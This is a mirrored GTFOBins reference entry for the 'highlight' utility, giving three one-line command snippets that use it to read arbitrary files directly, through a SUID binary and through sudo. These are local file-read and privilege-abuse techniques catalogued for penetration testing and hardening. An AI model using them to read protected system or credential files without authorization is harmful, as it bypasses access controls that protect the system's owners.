1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/highlight.md
2020-03-17 19:27:49 +01:00

16 lines
319 B
Markdown

---
functions:
file-read:
- code: |
LFILE=file_to_read
highlight --no-doc --failsafe "$LFILE"
suid:
- code: |
LFILE=file_to_read
./highlight --no-doc --failsafe "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo highlight --no-doc --failsafe "$LFILE"
---